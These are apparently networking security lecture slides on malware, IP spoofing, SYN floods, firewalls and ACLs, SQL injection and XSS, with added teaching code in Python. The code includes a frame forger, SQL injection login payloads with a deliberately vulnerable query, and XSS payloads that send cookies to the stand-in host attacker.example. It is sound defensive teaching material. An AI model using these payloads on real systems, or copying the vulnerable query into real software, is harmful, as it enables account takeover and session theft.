References
Computer Networking: A Top-Down Approach, 4th edition, Chapters 1 and 8. Jim Kurose and Keith Ross, Addison-Wesley, July 2007.
Outline
- Network Attacks
- Introduction to Firewalls
- Firewall Products
Malware (1/2)
- Spyware: infection by downloading a web page that carries the spyware; it records keystrokes and web sites visited and uploads the information to a collection site.
- Virus: infection by receiving an object (e.g., an e-mail attachment) and actively executing it; self-replicating: propagates itself to other hosts and users.
- Worm: infection by passively receiving an object that gets itself executed, with no user action; self-replicating.
Malware (2/2)
- Trojan horse: malicious code hidden inside apparently useful software. Examples named on the slide: BirdSpy (made in Taiwan), Restore OS. Infected hosts are used for DDoS.
- Mail bomb
- SPAM
TCP Three-Way Handshake
Step 1: the client host sends a TCP SYN segment to the server (SYN=1, Seq=2000): it specifies the client's initial sequence number and carries no data.
Step 2: the server host receives the SYN and replies with a SYNACK segment (SYN=1, ACK=1, Seq=4000, ACK#=2001, window size): the server allocates buffers and specifies its own initial sequence number.
Step 3: the client receives the SYN/ACK and replies with an ACK segment (ACK#=4001), which may contain data.
Denial of Service (DoS)
1. Select the target.
2. Break into hosts around the network (see malware).
3. Send packets toward the target from the compromised hosts.
Packet Sniffing
- A promiscuous network interface reads and records all packets passing by.
- Broadcast media (shared Ethernet, wireless): every frame reaches every attached host, so a sniffer needs no special position on the network.
- Wireshark (formerly Ethereal) is a packet sniffer!
- An attacker can sniff your packets; an attacker on the path can also modify or delete them.
[Figure: C, in promiscuous mode, reads the packet "src:B dest:A payload" exchanged between Alice (A) and Bob (B).]
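What a sniffer on the shared medium actually does with the bytes it sees, as an added example that is not part of the original slides: a small Ethernet II / IPv4 / TCP decoder in Python that verifies the IP and TCP checksums the way Wireshark does, run over two constructed frames. The hosts, addresses and the HTTP payload are assumptions; the second frame reproduces the next slide's IP spoofing point, since C can write Bob's IP address into the source field and only the source MAC on the local segment gives C away.

```python
import struct

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Constructed hosts for the slide's figure: Alice (A), Bob (B) and the sniffer C (assumed addresses).
ALICE = ("10.0.0.1", "aa:aa:aa:aa:aa:01")
BOB = ("10.0.0.2", "aa:aa:aa:aa:aa:02")
C = ("10.0.0.3", "aa:aa:aa:aa:aa:03")


def inet_checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def _ip(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, flags, payload=b"", seq=0, ack=0):
    """Assemble Ethernet II / IPv4 / TCP with valid IP and TCP checksums (constructed traffic)."""
    src, dst = _ip(src_ip), _ip(dst_ip)
    flag_bits = sum(TCP_FLAGS[f] for f in flags)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flag_bits, 65535, 0, 0) + payload
    pseudo = src + dst + struct.pack("!BBH", 0, PROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", inet_checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, PROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return _mac(dst_mac) + _mac(src_mac) + struct.pack("!H", ETHERTYPE_IPV4) + ip + tcp


def parse_frame(frame: bytes) -> dict:
    """Decode one frame the way a promiscuous sniffer does; raise on a corrupted header."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("only IPv4 is decoded here")
    ip = frame[14:]
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or inet_checksum(ip[:ihl]) != 0:   # a header with a valid checksum sums to zero
        raise ValueError("bad IPv4 header")
    if proto != PROTO_TCP:
        raise ValueError("only TCP is decoded here")
    tcp = ip[ihl:total_len]
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    pseudo = src + dst + struct.pack("!BBH", 0, PROTO_TCP, len(tcp))
    if inet_checksum(pseudo + tcp) != 0:
        raise ValueError("bad TCP checksum")
    data_offset = (off_flags >> 12) * 4
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src_ip": ".".join(str(b) for b in src), "dst_ip": ".".join(str(b) for b in dst), "ttl": ttl,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "window": window,
        "flags": [name for name, bit in TCP_FLAGS.items() if off_flags & bit],
        "payload": tcp[data_offset:],
    }


def sniff_demo():
    """What C sees on the shared medium: Bob's genuine packet to Alice, then C's forgery of it."""
    request = b"GET /private HTTP/1.1\r\nCookie: session=s3cr3t\r\n\r\n"   # constructed payload
    genuine = build_frame(BOB[1], ALICE[1], BOB[0], ALICE[0], 40000, 80, ["PSH", "ACK"], request, seq=1000, ack=1)
    # IP spoofing: C puts Bob's IP address in the source field; only the source MAC betrays the real sender.
    forged = build_frame(C[1], ALICE[1], BOB[0], ALICE[0], 40000, 80, ["PSH", "ACK"], request, seq=1000, ack=1)
    return parse_frame(genuine), parse_frame(forged)
```

The checksum check matters in practice: a sniffer that skips it happily decodes garbage, and an attacker who knows a sensor ignores checksums can feed it packets the real endpoint will discard.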
IP Spoofing
- Send a packet with a false source address: C emits a packet marked "src:B dest:A payload", and A cannot tell from the header that it came from C rather than from B.
- Defence: end-point authentication; the IP source address is not proof of who sent the packet.
[Figure: hosts A, B and C on the same network; C injects the packet "src:B dest:A payload".]
How to Provide Security?
More throughout this course:
- Cryptographic techniques: obvious uses and not-so-obvious uses
- Firewalls
Firewalls
A firewall isolates an organization's internal network from the Internet, allowing some packets to pass and blocking others.
[Figure: administered network | firewall | public Internet; the firewall sits at the boundary router and operates on IP packets.]
Goals of Firewalls
- Prevent denial-of-service attacks, e.g. SYN flooding: the attacker establishes many bogus half-open TCP connections, so no resources are left for real connections.
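The handshake from the earlier slide and the SYN flood described here, played out in Python as an added example (not code from the slides): a listener that keeps one entry per half-open connection is flooded with SYNs from spoofed sources and then refuses an honest client, while the same listener with SYN cookies keeps no state per SYN and still completes the honest handshake. The backlog size, addresses, the 60-second cookie slot and the simplified cookie construction are assumptions; the client sequence number 2000 and server number 4000 follow the slide.

```python
import hashlib
import hmac
import os
import random

MASK32 = 0xFFFFFFFF


class TcpListener:
    """Server side of the three-way handshake, with or without SYN cookies."""

    def __init__(self, backlog: int, syn_cookies: bool = False):
        self.backlog = backlog            # how many half-open connections the server will hold
        self.syn_cookies = syn_cookies
        self.half_open = {}               # (client ip, client port) -> server ISN awaiting the final ACK
        self.established = set()
        self.secret = os.urandom(16)      # per-boot cookie key
        self.next_isn = 4000              # the slide's server sequence number
        self.refused_syns = 0

    def _cookie(self, ip, port, slot):
        # Real SYN cookies pack a time counter and an MSS index into the ISN; this simplified version
        # (an assumption of the example) derives the whole 32-bit ISN from a keyed hash of the client
        # and a 60-second time slot.
        mac = hmac.new(self.secret, f"{ip}:{port}:{slot}".encode(), hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def on_syn(self, ip, port, client_seq, now):
        """Step 2: answer a SYN with (server seq, ack#) for the SYNACK, or None if refused."""
        if self.syn_cookies:
            return self._cookie(ip, port, now // 60), (client_seq + 1) & MASK32   # no state allocated
        if len(self.half_open) >= self.backlog:
            self.refused_syns += 1        # backlog full: real clients are turned away too
            return None
        self.next_isn = (self.next_isn + 1) & MASK32
        self.half_open[(ip, port)] = self.next_isn
        return self.next_isn, (client_seq + 1) & MASK32

    def on_ack(self, ip, port, ack_num, now):
        """Step 3: the client's ACK must acknowledge server ISN + 1."""
        if self.syn_cookies:
            for slot in (now // 60, now // 60 - 1):   # accept the current and the previous slot
                if (ack_num - 1) & MASK32 == self._cookie(ip, port, slot):
                    self.established.add((ip, port))
                    return True
            return False
        isn = self.half_open.get((ip, port))
        if isn is None or ack_num != (isn + 1) & MASK32:
            return False
        del self.half_open[(ip, port)]
        self.established.add((ip, port))
        return True


def simulate(syn_cookies, flood_size=1000, backlog=128, seed=1):
    """SYN flood from spoofed sources, then one honest client trying to connect (constructed scenario)."""
    rng = random.Random(seed)
    server = TcpListener(backlog, syn_cookies)
    now = 10_000
    for _ in range(flood_size):   # attacker: SYNs with forged source addresses, never a third packet
        server.on_syn(f"203.0.113.{rng.randrange(256)}", rng.randrange(1024, 65536), rng.randrange(2**32), now)
    reply = server.on_syn("198.51.100.7", 12543, 2000, now)          # honest client, Seq=2000 as on the slide
    connected = False
    if reply is not None:
        server_seq, ack = reply                                       # ack == 2001
        connected = server.on_ack("198.51.100.7", 12543, (server_seq + 1) & MASK32, now)
    return {"client_connected": connected, "half_open": len(server.half_open),
            "refused_syns": server.refused_syns, "established": len(server.established)}
```

The point of the comparison is where the memory lives: without cookies every spoofed SYN costs the server a table entry until it times out, so the attacker wins by volume; with cookies the server spends nothing until a correct third packet arrives, which the attacker cannot produce for a source address it does not control.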
Types of Firewalls
Three types of firewalls:
- Stateless packet filters
- Stateful packet filters
- Application gateways
Firewall Setting
Example policy, expressed as filter rules:
- Drop all outgoing packets to any IP address, port 80 (no outside web access).
- Drop all incoming TCP SYN packets to any IP except 130.207.244.203, port 80 (no incoming connections except to the institution's public web server).
- Drop all incoming UDP packets except DNS and router broadcasts.
- Drop all ICMP packets going to a broadcast address (e.g. 130.207.255.255), so the network cannot be used as an amplifier in a smurf attack.
- Drop all outgoing ICMP TTL-expired traffic, so the network cannot be mapped with traceroute.
Stateless Packet Filters
A stateless filter judges each packet on its own headers, so it admits packets that make no sense. Example: the packet below is accepted only because the ACK bit is set, even though no TCP connection was ever established.
Source IP: 150.23.23.155, Destination IP: 222.22.0.2, Source port: 80, Destination port: 12543, flags: ACK

Stateful Packet Filters
- Track the status of every TCP connection.
- Connection setup (SYN) and teardown (FIN): the filter can determine whether incoming and outgoing packets make sense.
- Timeout inactive connections at the firewall: their packets are no longer admitted.
- The ACL is augmented to indicate the need to check the connection state table before admitting a packet; the packet above is then dropped unless an inside host opened the connection first.
Example: Cisco IOS standard access list
R2(config)#access-list 21 deny host 211.21.160.12
R2(config)#access-list 21 permit any
R2(config)#interface serial 1
R2(config-if)#ip access-group 21 in
Notation: "any" is shorthand for 0.0.0.0 255.255.255.255 (address followed by a wildcard mask), "host X" for X 0.0.0.0, and 10.5.3.0/24 is written 10.5.3.0 0.0.0.255; every access list ends with an implicit deny of everything (deny ip any any in extended lists).
[Figure: topology R1 (interface e0) connected to R2 (serial interfaces S0, S1); the list is applied inbound on R2's serial 1.]
Packet filter ACL from the slide (the first matching row decides):
action | protocol | source port | dest port | flag bit
allow | TCP | > 1023 | 80 | any
allow | TCP | 80 | > 1023 | ACK
allow | UDP | > 1023 | 53 | ---
allow | UDP | 53 | > 1023 | ----
deny | all | all | all | all
The two TCP rows let inside hosts open HTTP connections and let the replies come back; the UDP rows do the same for DNS; everything else is denied.
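The ACL above implemented twice in Python, as an added example that is not from the slides: a stateless filter that applies the five rows to each packet alone, and a stateful filter that additionally keeps the connection table, times out idle flows and refuses inbound packets with no matching outbound SYN or DNS query. It is run over the earlier slide's suspect packet (port 80 to 12543, ACK set). The inside network 222.22.0.0/16, the timeouts and the packet dictionaries are assumptions.

```python
import ipaddress

INSIDE = ipaddress.ip_network("222.22.0.0/16")   # assumed: the /16 containing the slide's 222.22.0.2

# The slide's ACL: (action, protocol, direction, source port, destination port, required TCP flag).
ACL = [
    ("allow", "TCP", "out", ">1023", 80, None),   # inside hosts may open HTTP connections
    ("allow", "TCP", "in", 80, ">1023", "ACK"),   # web replies (ACK set, so they cannot open a connection)
    ("allow", "UDP", "out", ">1023", 53, None),   # DNS queries
    ("allow", "UDP", "in", 53, ">1023", None),    # DNS replies
    ("deny", "all", "all", "any", "any", None),   # default deny
]


def _port_ok(spec, port):
    if spec == "any":
        return True
    if spec == ">1023":
        return port > 1023
    return port == spec


def direction(pkt):
    return "out" if ipaddress.ip_address(pkt["src"]) in INSIDE else "in"


def stateless_filter(pkt):
    """First matching ACL row decides; each packet is judged on its own headers."""
    d = direction(pkt)
    for action, proto, rdir, sport, dport, flag in ACL:
        if proto not in ("all", pkt["proto"]) or rdir not in ("all", d):
            continue
        if not (_port_ok(sport, pkt["sport"]) and _port_ok(dport, pkt["dport"])):
            continue
        if flag is not None and flag not in pkt["flags"]:
            continue
        return action
    return "deny"


class StatefulFilter:
    """Same ACL, plus a connection table that inbound packets must match."""

    def __init__(self, idle_timeout=60, fin_grace=5):
        self.table = {}          # (inside ip, inside port, outside ip, outside port, proto) -> state
        self.idle_timeout = idle_timeout
        self.fin_grace = fin_grace

    @staticmethod
    def _key(pkt):
        if direction(pkt) == "out":
            return (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"], pkt["proto"])
        return (pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"], pkt["proto"])

    def expire(self, now):
        """Timeout inactive connections; a flow closed by FINs from both sides goes sooner."""
        dead = [k for k, e in self.table.items()
                if now - e["last"] > (self.fin_grace if len(e["fins"]) == 2 else self.idle_timeout)]
        for k in dead:
            del self.table[k]

    def admit(self, pkt, now):
        self.expire(now)
        if stateless_filter(pkt) == "deny":
            return "deny"
        d, key = direction(pkt), self._key(pkt)
        entry = self.table.get(key)
        if entry is None:
            # Only an outbound SYN (or an outbound DNS query) creates state. An inbound packet, or an
            # outbound mid-stream packet, with no known connection makes no sense and is dropped.
            if d == "in" or (pkt["proto"] == "TCP" and "SYN" not in pkt["flags"]):
                return "deny"
            entry = self.table[key] = {"last": now, "fins": set()}
        entry["last"] = now
        if "FIN" in pkt["flags"]:
            entry["fins"].add(d)
        if "RST" in pkt["flags"]:
            del self.table[key]
        return "allow"


# Constructed packets. SUSPECT is the slide's example: ACK set, from port 80, no connection behind it.
SUSPECT = {"src": "150.23.23.155", "dst": "222.22.0.2", "proto": "TCP", "sport": 80, "dport": 12543, "flags": {"ACK"}}
CLIENT_SYN = {"src": "222.22.0.2", "dst": "150.23.23.155", "proto": "TCP", "sport": 12543, "dport": 80, "flags": {"SYN"}}
SERVER_SYNACK = {**SUSPECT, "flags": {"SYN", "ACK"}}


def compare():
    """Verdicts of both filters on the slide's packet, before and after a real handshake."""
    fw = StatefulFilter()
    return {
        "stateless": stateless_filter(SUSPECT),
        "stateful_no_connection": fw.admit(SUSPECT, now=0),
        "stateful_after_syn": (fw.admit(CLIENT_SYN, now=1), fw.admit(SERVER_SYNACK, now=2), fw.admit(SUSPECT, now=3)),
        "stateful_after_idle": fw.admit(SUSPECT, now=3 + 61),
    }
```

The same ACL row that admits the suspect packet also admits any inbound UDP from port 53 to a high port; the stateful version only passes a DNS reply to the port that actually sent the query, which is the difference between a filter and a firewall that understands sessions.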
Application Gateways
Filter packets on application data as well as on IP/TCP/UDP fields.
[Figure: host-to-gateway telnet session relayed through the application gateway.]
Comparison
- Stateless/stateful filters: operate on TCP/IP headers only; no correlation check among sessions.
- Application gateways: inspect the application data.
Intrusion Detection System (IDS)
- Detects and alerts if something is wrong.
- Multiple IDSs: different types of checking at different locations.
[Figure: application gateway firewall, DNS server, demilitarized zone.]
Products
- General firewall
- IDS, IPS
- Mail firewall
- Web Application Firewall (WAF)
Mail Firewall
- Anti-virus
- Anti-spam
Web Application Firewall (WAF)
[Slide text partly lost; remaining labels: (A1) JavaScript, SQL; (A2) Web.]
SQL Injection
Normal connection: ID=A123456789, Passwd=1234
Injected connection: ID=Admin' --, Passwd=1234 (the quote closes the string literal and "--" starts a SQL comment, so the password check is never evaluated and the attacker logs in as Admin).
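The injected login above, run against a real database as an added example (not code from the slides): Python with sqlite3, the vulnerable string-built query beside the parameterised one, so the same input "Admin' --" logs in as Admin through the first and fails through the second. The table contents and the Admin password are constructed; passwords are stored in plaintext only to mirror the slide, a real system would store hashes.

```python
import sqlite3

INJECTED_ID, INJECTED_PW = "Admin' --", "1234"   # the slide's injected login


def setup_db():
    """In-memory users table with constructed rows (plaintext passwords only to mirror the slide)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT PRIMARY KEY, passwd TEXT NOT NULL)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("A123456789", "1234"), ("Admin", "correct horse battery staple")])
    return db


def build_query(user_id, passwd):
    """The vulnerable pattern: user input pasted straight into the SQL text."""
    return f"SELECT id FROM users WHERE id = '{user_id}' AND passwd = '{passwd}'"


def login_vulnerable(db, user_id, passwd):
    """Returns the authenticated id, or None. Anything after the attacker's -- is a comment."""
    row = db.execute(build_query(user_id, passwd)).fetchone()
    return row[0] if row else None


def login_safe(db, user_id, passwd):
    """Parameterised query: values travel separately from the SQL, so a quote is just a character."""
    row = db.execute("SELECT id FROM users WHERE id = ? AND passwd = ?", (user_id, passwd)).fetchone()
    return row[0] if row else None


def demo():
    """The slide's normal and injected logins, plus a tautology payload that needs no username at all."""
    db = setup_db()
    return {
        "normal": login_vulnerable(db, "A123456789", "1234"),
        "injected_query": build_query(INJECTED_ID, INJECTED_PW),
        "injected_vulnerable": login_vulnerable(db, INJECTED_ID, INJECTED_PW),
        "injected_safe": login_safe(db, INJECTED_ID, INJECTED_PW),
        "tautology_vulnerable": login_vulnerable(db, "' OR '1'='1", "1234"),
    }
```

The tautology case shows why "just block --" is not a fix: with AND binding tighter than OR, the condition becomes id = '' OR ('1'='1' AND passwd = '1234') and returns whichever account happens to have that password. Only keeping data out of the query text, as login_safe does, closes the class.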
XSS Case 1: the injected script reads the victim's cookies and sends them to the hacker's computer. [Slide text partly lost.]
XSS Case 2: the injected script sends the victim to the hacker's server on another domain. [Slide text partly lost; remaining labels: domain, hacker's computer, hacker's server.]
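Both XSS cases as an added example, not code from the slides: a page that reflects a query parameter unescaped beside the escaped version, rendered with constructed payloads for cookie theft (case 1) and redirection to the attacker's domain (case 2), plus the Set-Cookie header whose HttpOnly flag keeps a session cookie out of document.cookie even when a script does run. The attacker host attacker.example, the page template and the regex standing in for the browser's parser are assumptions.

```python
import html
import re

# Constructed payloads for the two slide cases (attacker.example is an assumed attacker host).
COOKIE_THIEF = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"   # case 1
REDIRECTOR = "<script>location='http://attacker.example/login'</script>"                        # case 2


def render_vulnerable(name):
    """Reflects the parameter into the page unchanged: whatever it contains becomes HTML."""
    return f"<html><body><h1>Welcome, {name}!</h1></body></html>"


def render_safe(name):
    """Encodes <, >, &, ' and \" so the browser displays the text instead of executing it."""
    return f"<html><body><h1>Welcome, {html.escape(name, quote=True)}!</h1></body></html>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def executes_script(page):
    """Crude stand-in for the browser's parser: is there a live <script> tag in the page?"""
    return SCRIPT_TAG.search(page) is not None


def session_cookie_header(token):
    """HttpOnly keeps the cookie out of document.cookie, so case 1 steals nothing even if XSS lands."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def demo():
    return {
        "case1_vulnerable": executes_script(render_vulnerable(COOKIE_THIEF)),
        "case1_safe": executes_script(render_safe(COOKIE_THIEF)),
        "case2_vulnerable": executes_script(render_vulnerable(REDIRECTOR)),
        "case2_safe": executes_script(render_safe(REDIRECTOR)),
        "safe_page": render_safe(COOKIE_THIEF),
    }
```

html.escape is the right tool only for text placed in an HTML element body or a quoted attribute; a value dropped into a JavaScript string or a URL needs that context's own encoding, and HttpOnly limits the damage of case 1 but does nothing for case 2.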
Summary
- Firewall: review the firewall log
- IDS / IPS?
- MIS